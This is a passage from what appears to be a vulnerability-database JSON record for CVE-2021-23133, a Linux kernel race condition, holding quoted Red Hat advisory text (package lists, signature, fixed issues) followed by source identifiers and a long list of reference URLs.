8):\n\nSource:\nkernel-4.18.0-348.el8.src.rpm\n\naarch64:\nbpftool-4.18.0-348.el8.aarch64.rpm\nbpftool-debuginfo-4.18.0-348.el8.aarch64.rpm\nkernel-4.18.0-348.el8.aarch64.rpm\nkernel-core-4.18.0-348.el8.aarch64.rpm\nkernel-cross-headers-4.18.0-348.el8.aarch64.rpm\nkernel-debug-4.18.0-348.el8.aarch64.rpm\nkernel-debug-core-4.18.0-348.el8.aarch64.rpm\nkernel-debug-debuginfo-4.18.0-348.el8.aarch64.rpm\nkernel-debug-devel-4.18.0-348.el8.aarch64.rpm\nkernel-debug-modules-4.18.0-348.el8.aarch64.rpm\nkernel-debug-modules-extra-4.18.0-348.el8.aarch64.rpm\nkernel-debuginfo-4.18.0-348.el8.aarch64.rpm\nkernel-debuginfo-common-aarch64-4.18.0-348.el8.aarch64.rpm\nkernel-devel-4.18.0-348.el8.aarch64.rpm\nkernel-headers-4.18.0-348.el8.aarch64.rpm\nkernel-modules-4.18.0-348.el8.aarch64.rpm\nkernel-modules-extra-4.18.0-348.el8.aarch64.rpm\nkernel-tools-4.18.0-348.el8.aarch64.rpm\nkernel-tools-debuginfo-4.18.0-348.el8.aarch64.rpm\nkernel-tools-libs-4.18.0-348.el8.aarch64.rpm\nperf-4.18.0-348.el8.aarch64.rpm\nperf-debuginfo-4.18.0-348.el8.aarch64.rpm\npython3-perf-4.18.0-348.el8.aarch64.rpm\npython3-perf-debuginfo-4.18.0-348.el8.aarch64.rpm\n\nnoarch:\nkernel-abi-stablelists-4.18.0-348.el8.noarch.rpm\nkernel-doc-4.18.0-348.el8.noarch.rpm\n\nppc64le:\nbpftool-4.18.0-348.el8.ppc64le.rpm\nbpftool-debuginfo-4.18.0-348.el8.ppc64le.rpm\nkernel-4.18.0-348.el8.ppc64le.rpm\nkernel-core-4.18.0-348.el8.ppc64le.rpm\nkernel-cross-headers-4.18.0-348.el8.ppc64le.rpm\nkernel-debug-4.18.0-348.el8.ppc64le.rpm\nkernel-debug-core-4.18.0-348.el8.ppc64le.rpm\nkernel-debug-debuginfo-4.18.0-348.el8.ppc64le.rpm\nkernel-debug-devel-4.18.0-348.el8.ppc64le.rpm\nkernel-debug-modules-4.18.0-348.el8.ppc64le.rpm\nkernel-debug-modules-extra-4.18.0-348.el8.ppc64le.rpm\nkernel-debuginfo-4.18.0-348.el8.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-4.18.0-348.el8.ppc64le.rpm\nkernel-devel-4.18.0-348.el8.ppc64le.rpm\nkernel-headers-4.18.0-348.el8.ppc64le.rpm\nkernel-modules-4.18.0-348.el8.ppc64le.rpm\nkernel-modules-extra-4.18.0-348.el8.ppc64le.rpm\nkernel-tools-4.18.0-348.el8.ppc64le.rpm\nkernel-tools-debuginfo-4.18.0-348.el8.ppc64le.rpm\nkernel-tools-libs-4.18.0-348.el8.ppc64le.rpm\nperf-4.18.0-348.el8.ppc64le.rpm\nperf-debuginfo-4.18.0-348.el8.ppc64le.rpm\npython3-perf-4.18.0-348.el8.ppc64le.rpm\npython3-perf-debuginfo-4.18.0-348.el8.ppc64le.rpm\n\ns390x:\nbpftool-4.18.0-348.el8.s390x.rpm\nbpftool-debuginfo-4.18.0-348.el8.s390x.rpm\nkernel-4.18.0-348.el8.s390x.rpm\nkernel-core-4.18.0-348.el8.s390x.rpm\nkernel-cross-headers-4.18.0-348.el8.s390x.rpm\nkernel-debug-4.18.0-348.el8.s390x.rpm\nkernel-debug-core-4.18.0-348.el8.s390x.rpm\nkernel-debug-debuginfo-4.18.0-348.el8.s390x.rpm\nkernel-debug-devel-4.18.0-348.el8.s390x.rpm\nkernel-debug-modules-4.18.0-348.el8.s390x.rpm\nkernel-debug-modules-extra-4.18.0-348.el8.s390x.rpm\nkernel-debuginfo-4.18.0-348.el8.s390x.rpm\nkernel-debuginfo-common-s390x-4.18.0-348.el8.s390x.rpm\nkernel-devel-4.18.0-348.el8.s390x.rpm\nkernel-headers-4.18.0-348.el8.s390x.rpm\nkernel-modules-4.18.0-348.el8.s390x.rpm\nkernel-modules-extra-4.18.0-348.el8.s390x.rpm\nkernel-tools-4.18.0-348.el8.s390x.rpm\nkernel-tools-debuginfo-4.18.0-348.el8.s390x.rpm\nkernel-zfcpdump-4.18.0-348.el8.s390x.rpm\nkernel-zfcpdump-core-4.18.0-348.el8.s390x.rpm\nkernel-zfcpdump-debuginfo-4.18.0-348.el8.s390x.rpm\nkernel-zfcpdump-devel-4.18.0-348.el8.s390x.rpm\nkernel-zfcpdump-modules-4.18.0-348.el8.s390x.rpm\nkernel-zfcpdump-modules-extra-4.18.0-348.el8.s390x.rpm\nperf-4.18.0-348.el8.s390x.rpm\nperf-debuginfo-4.18.0-348.el8.s390x.rpm\npython3-perf-4.18.0-348.el8.s390x.rpm\npython3-perf-debuginfo-4.18.0-348.el8.s390x.rpm\n\nx86_64:\nbpftool-4.18.0-348.el8.x86_64.rpm\nbpftool-debuginfo-4.18.0-348.el8.x86_64.rpm\nkernel-4.18.0-348.el8.x86_64.rpm\nkernel-core-4.18.0-348.el8.x86_64.rpm\nkernel-cross-headers-4.18.0-348.el8.x86_64.rpm\nkernel-debug-4.18.0-348.el8.x86_64.rpm\nkernel-debug-core-4.18.0-348.el8.x86_64.rpm\nkernel-debug-debuginfo-4.18.0-348.el8.x86_64.rpm\nkernel-debug-devel-4.18.0-348.el8.x86_64.rpm\nkernel-debug-modules-4.18.0-348.el8.x86_64.rpm\nkernel-debug-modules-extra-4.18.0-348.el8.x86_64.rpm\nkernel-debuginfo-4.18.0-348.el8.x86_64.rpm\nkernel-debuginfo-common-x86_64-4.18.0-348.el8.x86_64.rpm\nkernel-devel-4.18.0-348.el8.x86_64.rpm\nkernel-headers-4.18.0-348.el8.x86_64.rpm\nkernel-modules-4.18.0-348.el8.x86_64.rpm\nkernel-modules-extra-4.18.0-348.el8.x86_64.rpm\nkernel-tools-4.18.0-348.el8.x86_64.rpm\nkernel-tools-debuginfo-4.18.0-348.el8.x86_64.rpm\nkernel-tools-libs-4.18.0-348.el8.x86_64.rpm\nperf-4.18.0-348.el8.x86_64.rpm\nperf-debuginfo-4.18.0-348.el8.x86_64.rpm\npython3-perf-4.18.0-348.el8.x86_64.rpm\npython3-perf-debuginfo-4.18.0-348.el8.x86_64.rpm\n\nRed Hat Enterprise Linux CRB (v. 8):\n\naarch64:\nbpftool-debuginfo-4.18.0-348.el8.aarch64.rpm\nkernel-debug-debuginfo-4.18.0-348.el8.aarch64.rpm\nkernel-debuginfo-4.18.0-348.el8.aarch64.rpm\nkernel-debuginfo-common-aarch64-4.18.0-348.el8.aarch64.rpm\nkernel-tools-debuginfo-4.18.0-348.el8.aarch64.rpm\nkernel-tools-libs-devel-4.18.0-348.el8.aarch64.rpm\nperf-debuginfo-4.18.0-348.el8.aarch64.rpm\npython3-perf-debuginfo-4.18.0-348.el8.aarch64.rpm\n\nppc64le:\nbpftool-debuginfo-4.18.0-348.el8.ppc64le.rpm\nkernel-debug-debuginfo-4.18.0-348.el8.ppc64le.rpm\nkernel-debuginfo-4.18.0-348.el8.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-4.18.0-348.el8.ppc64le.rpm\nkernel-tools-debuginfo-4.18.0-348.el8.ppc64le.rpm\nkernel-tools-libs-devel-4.18.0-348.el8.ppc64le.rpm\nperf-debuginfo-4.18.0-348.el8.ppc64le.rpm\npython3-perf-debuginfo-4.18.0-348.el8.ppc64le.rpm\n\nx86_64:\nbpftool-debuginfo-4.18.0-348.el8.x86_64.rpm\nkernel-debug-debuginfo-4.18.0-348.el8.x86_64.rpm\nkernel-debuginfo-4.18.0-348.el8.x86_64.rpm\nkernel-debuginfo-common-x86_64-4.18.0-348.el8.x86_64.rpm\nkernel-tools-debuginfo-4.18.0-348.el8.x86_64.rpm\nkernel-tools-libs-devel-4.18.0-348.el8.x86_64.rpm\nperf-debuginfo-4.18.0-348.el8.x86_64.rpm\npython3-perf-debuginfo-4.18.0-348.el8.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2021 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYYrdRdzjgjWX9erEAQhs0w//as9X4T+FCf3TAbcNIStxlOK6fbJoAlST\nFrgNJnRH3RmT+VxRSLWZcsJQf78kudeJWtMezbGSVREfhCMBCGhKZ7mvVp5P7J8l\nbobmdaap3hqkPqq66VuKxGuS+6j0rXXgGQH034yzoX+L/lx6KV9qdAnZZO+7kWcy\nSfX0GkLg0ARDMfsoUKwVmeUeNLhPlJ4ZH2rBdZ4FhjyEAG/5yL9JwU/VNReWHjhW\nHgarTuSnFR3vLQDKyjMIEEiBPOI162hS2j3Ba/A/1hJ70HOjloJnd0eWYGxSuIfC\nDRrzlacFNAzBPZsbRFi1plXrHh5LtNoBBWjl+xyb6jRsB8eXgS+WhzUhOXGUv01E\nlJTwFy5Kz71d+cAhRXgmz5gVgWuoNJw8AEImefWcy4n0EEK55vdFe0Sl7BfZiwpD\nJhx97He6OurNnLrYyJJ0+TsU1L33794Ag2AJZnN1PLFUyrKKNlD1ZWtdsJg99klK\ndQteUTnnUhgDG5Tqulf0wX19BEkLd/O6CRyGueJcV4h4PFpSoWOh5Yy/BlokFzc8\nzf14PjuVueIodaIUXtK+70Zmw7tg09Dx5Asyfuk5hWFPYv856nHlDn7PT724CU8v\n1cp96h1IjLR6cF17NO2JCcbU0XZEW+aCkGkPcsY8DhBmaZqxUxXObvTD80Mm7EvN\n+PuV5cms0sE=2UUA\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. Solution:\n\nFor OpenShift Container Platform 4.9 see the following documentation, which\nwill be updated shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this errata update:\n\nhttps://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html\n\nFor Red Hat OpenShift Logging 5.3, see the following instructions to apply\nthis update:\n\nhttps://docs.openshift.com/container-platform/4.7/logging/cluster-logging-upgrading.html\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1963232 - CVE-2021-33194 golang: x/net/html: infinite loop in ParseFragment\n\n5. JIRA issues fixed (https://issues.jboss.org/):\n\nLOG-1168 - Disable hostname verification in syslog TLS settings\nLOG-1235 - Using HTTPS without a secret does not translate into the correct \u0027scheme\u0027 value in Fluentd\nLOG-1375 - ssl_ca_cert should be optional\nLOG-1378 - CLO should support sasl_plaintext(Password over http)\nLOG-1392 - In fluentd config, flush_interval can\u0027t be set with flush_mode=immediate\nLOG-1494 - Syslog output is serializing json incorrectly\nLOG-1555 - Fluentd logs emit transaction failed: error_class=NoMethodError while forwarding to external syslog server\nLOG-1575 - Rejected by Elasticsearch and unexpected json-parsing\nLOG-1735 - Regression introducing flush_at_shutdown \nLOG-1774 - The collector logs should  be excluded in fluent.conf\nLOG-1776 - fluentd total_limit_size sets value beyond available space\nLOG-1822 - OpenShift Alerting Rules Style-Guide Compliance\nLOG-1859 - CLO Should not error and exit early on missing ca-bundle when cluster wide proxy is not enabled\nLOG-1862 - Unsupported kafka parameters when enabled Kafka SASL\nLOG-1903 - Fix the Display of ClusterLogging type in OLM\nLOG-1911 - CLF API changes to Opt-in to multiline error detection\nLOG-1918 - Alert `FluentdNodeDown` always firing \nLOG-1939 - Opt-in multiline detection breaks cloudwatch forwarding\n\n6",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-23133"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-23133"
      },
      {
        "db": "PACKETSTORM",
        "id": "163249"
      },
      {
        "db": "PACKETSTORM",
        "id": "163251"
      },
      {
        "db": "PACKETSTORM",
        "id": "163262"
      },
      {
        "db": "PACKETSTORM",
        "id": "163291"
      },
      {
        "db": "PACKETSTORM",
        "id": "163301"
      },
      {
        "db": "PACKETSTORM",
        "id": "164875"
      },
      {
        "db": "PACKETSTORM",
        "id": "165296"
      },
      {
        "db": "PACKETSTORM",
        "id": "164837"
      },
      {
        "db": "PACKETSTORM",
        "id": "164967"
      }
    ],
    "trust": 1.8
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2021-23133",
        "trust": 2.0
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2021/05/10/1",
        "trust": 1.1
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2021/05/10/2",
        "trust": 1.1
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2021/04/18/2",
        "trust": 1.1
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2021/05/10/3",
        "trust": 1.1
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2021/05/10/4",
        "trust": 1.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-23133",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163249",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163251",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163262",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163291",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163301",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "164875",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "165296",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "164837",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "164967",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2021-23133"
      },
      {
        "db": "PACKETSTORM",
        "id": "163249"
      },
      {
        "db": "PACKETSTORM",
        "id": "163251"
      },
      {
        "db": "PACKETSTORM",
        "id": "163262"
      },
      {
        "db": "PACKETSTORM",
        "id": "163291"
      },
      {
        "db": "PACKETSTORM",
        "id": "163301"
      },
      {
        "db": "PACKETSTORM",
        "id": "164875"
      },
      {
        "db": "PACKETSTORM",
        "id": "165296"
      },
      {
        "db": "PACKETSTORM",
        "id": "164837"
      },
      {
        "db": "PACKETSTORM",
        "id": "164967"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-23133"
      }
    ]
  },
  "id": "VAR-202104-1571",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.625
  },
  "last_update_date": "2024-07-23T20:25:58.423000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Arch Linux Issues: ",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=cve-2021-23133 log"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2021-23133"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-362",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-23133"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.1,
        "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=b166a20b07382b8bc1dcee2a448715c9c2c81b5b"
      },
      {
        "trust": 1.1,
        "url": "https://www.openwall.com/lists/oss-security/2021/04/18/2"
      },
      {
        "trust": 1.1,
        "url": "http://www.openwall.com/lists/oss-security/2021/05/10/1"
      },
      {
        "trust": 1.1,
        "url": "http://www.openwall.com/lists/oss-security/2021/05/10/2"
      },
      {
        "trust": 1.1,
        "url": "http://www.openwall.com/lists/oss-security/2021/05/10/3"
      },
      {
        "trust": 1.1,
        "url": "http://www.openwall.com/lists/oss-security/2021/05/10/4"
      },
      {
        "trust": 1.0,
        "url": "https://lists.debian.org/debian-lts-announce/2021/06/msg00019.html"
      },
      {
        "trust": 1.0,
        "url": "https://lists.debian.org/debian-lts-announce/2021/06/msg00020.html"
      },
      {
        "trust": 1.0,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/cux2ca63453g34c6kyvbljxjxearzi2x/"
      },
      {
        "trust": 1.0,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/paeq3h6hkno6kucgrzvysfsageux23jl/"
      },
      {
        "trust": 1.0,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/xzashzvcofj4vu2i3bn5w5ephwjq7qwx/"
      },
      {
        "trust": 1.0,
        "url": "https://security.netapp.com/advisory/ntap-20210611-0008/"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-23133"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26147"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-24588"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-24586"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26145"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-24587"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26141"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26139"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3609"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33200"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-31829"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-26143"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-24504"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-3600"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-20239"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-26144"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-3679"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-36158"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-3635"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-31829"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-26145"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-36386"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-33200"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-29650"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-0427"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-3573"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-29368"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-20194"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-24586"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-26147"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-31916"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-26141"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-3348"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-28950"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-24588"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-26140"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-31440"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-26146"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-29646"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-29155"
      },
      {
        "trust": 0.4,
        "url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-3732"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-0129"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-3489"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-24503"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-29660"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-24587"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-26139"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/updates/classification/#moderate"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-28971"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-24502"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-24503"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-3659"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-3564"
      },
      {
        "trust": 0.4,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-0427"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-23133"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-24502"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-32399"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3506"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-23134"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33034"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-31440"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-27777"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3543"
      },
      {
        "trust": 0.2,
        "url": "https://ubuntu.com/security/notices/usn-4997-1"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-29155"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26144"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-24504"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20239"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20194"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-0129"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28950"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.5_release_notes/"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26143"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-29368"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26140"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-36386"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-29660"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28971"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-36158"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26146"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-16135"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3200"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-35448"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-25013"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-20284"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-25012"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-35522"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-5827"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-35524"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-20673"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-25013"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-25009"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-27645"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-33574"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3487"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-13435"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-5827"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-24370"
      },
      {
        "trust": 0.2,
        "url": "https://docs.openshift.com/container-platform/4.7/logging/cluster-logging-upgrading.html"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-14145"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-13751"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-10001"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-25014"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-19603"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-14145"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-25012"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-35521"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-35942"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-17594"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-36312"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-24370"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3572"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-12762"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-36086"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3778"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-13750"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-13751"
      },
      {
        "trust": 0.2,
